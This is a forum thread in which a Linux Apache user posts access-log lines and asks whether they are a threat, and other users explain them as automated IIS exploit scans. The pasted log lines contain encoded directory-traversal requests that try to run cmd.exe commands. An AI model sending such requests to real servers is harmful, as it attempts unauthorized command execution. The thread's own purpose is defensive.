should i be concerned
this is a log from my apache logs.
24.0.77.100 - - [26/Jan/2004:02:19:47 -0500] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 299 24.0.77.100 - - [26/Jan/2004:02:19:50 -0500] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 297 24.0.77.100 - - [26/Jan/2004:02:19:53 -0500] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 307 24.0.77.100 - - [26/Jan/2004:02:19:56 -0500] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 307 24.0.77.100 - - [26/Jan/2004:02:20:00 -0500] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 321 24.0.77.100 - - [26/Jan/2004:02:20:03 -0500] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 338 24.0.77.100 - - [26/Jan/2004:02:20:06 -0500] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 338 24.0.77.100 - - [26/Jan/2004:02:20:09 -0500] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 354 24.0.77.100 - - [26/Jan/2004:02:20:12 -0500] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 320 24.0.77.100 - - [26/Jan/2004:02:20:25 -0500] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 311 24.0.77.100 - - [26/Jan/2004:02:20:35 -0500] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 311 24.0.77.100 - - [26/Jan/2004:02:20:38 -0500] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 321 24.0.77.100 - - [26/Jan/2004:02:20:41 -0500] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 321 should i be concerned that someone is 'trying' to find what could be important files, if this were a windows machine. what constituts as something i should take action towards? this guys not too bright obviously.. but still.. does snooping around like this happen often? other question.. can i block my own ip from being logged? as 80% or more of the log is either my cable IP, eth0 IP or loopback's IP.. so it would be nice if i just saw what other people were doing. |
It doesnt look like someone is snooping around your system. The reason why I say this is because it looks like there is access to a scripts directory through your web server setup. A script might be executing cmd.exe to run correctly. I'm not sure what software your using as your web server, but to my knowledge, I dont believe you can omit your own IP address from a log.
|
No, you really don't need to be worried about it. They're scanning for IIS exploits, they really don't apply to you :)
I run a webserver and get that alot, its mostly just script-kiddies looking around for an *easy hack*. Maybe jot down the ip that the scan came from and keep an eye out for other scans from the same general IP address. If it gets to be a problem bring it up w/ the ISP. If you start seeing apache specific exploits then you should start being a little more worried. Just keep an eye on your secure and message log files for unusal stuff. All in all your fine tho. You'll probably see alot more of those. |
ok thanks..
although i don't have a scripts folder within my webpage directory.. so that's why i was wondering why they're be trying to look for something in there.. i am using apache2 on fedora linux. |
All times are GMT -5. The time now is 02:07 PM. |